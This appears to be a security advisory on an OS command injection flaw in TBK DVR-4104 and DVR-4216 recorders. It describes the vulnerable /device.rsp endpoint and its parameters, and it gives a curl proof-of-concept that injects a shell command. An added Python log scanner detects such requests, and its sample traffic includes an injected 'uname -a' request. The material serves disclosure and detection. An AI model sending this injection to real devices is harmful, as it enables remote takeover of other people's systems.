TBK DVR devices have been found to be vulnerable to a more severe command injection. Unlike CVE-2018-9995, the newly discovered vulnerability enables execution of arbitrary commands on the device's operating system, affecting over 114,000 devices exposed on the Internet.
- TBK DVR-4104
- TBK DVR-4216
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
This is achieved through a specially crafted POST request to the /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ endpoint. By manipulating the mdb and mdc parameters, attackers can execute shell commands, as demonstrated by the PoC.
The attacker sends a POST request to the vulnerable DVR device:
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
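Defenders can look for the request pattern described above in HTTP access logs in front of or on the DVR. The following is an added detection example, not code from the original advisory or from the vendor; it assumes Common Log Format lines and uses constructed sample traffic (the `uname -a` value and the RFC 5737 source addresses are made up for the demonstration).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint, command marker and parameter names taken from the advisory text.
VULN_PATH = "/device.rsp"
VULN_CMD = "___S_O_S_T_R_E_A_MAX___"

# Common Log Format: src ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def analyze_target(target):
    """Classify one request target; return a finding dict or None if benign."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if VULN_CMD not in qs.get("cmd", []):
        return None
    # The marker alone is worth a look; mdb/mdc alongside it is the injection
    # pattern from the advisory, so rate it higher and surface the decoded
    # mdc value so an analyst can see what was attempted.
    if "mdc" in qs or "mdb" in qs:
        return {"severity": "high", "command": qs.get("mdc", [""])[0]}
    return {"severity": "medium", "command": None}

def scan_log(text):
    """Run analyze_target over every access-log line; return the findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_target(m.group("target"))
        if finding:
            finding.update(src=m.group("src"), method=m.group("method"),
                           status=m.group("status"))
            findings.append(finding)
    return findings

# Constructed sample lines (not real traffic); the third is a probe without mdc.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [10/May/2024:12:00:02 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a HTTP/1.1" 200 88
198.51.100.4 - - [10/May/2024:12:00:03 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ HTTP/1.1" 200 40
192.0.2.9 - - [10/May/2024:12:00:04 +0000] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 200 120
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because the PoC sets a fixed `Cookie: uid=1`, the same matcher can be extended to the cookie field if your log format records it.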
The vulnerability allows unauthorized remote attackers to execute arbitrary commands on the device. This could lead to unauthorized access to device data, modification of system configurations, or a complete compromise of the device.
- Apply available patches and updates from the device manufacturer.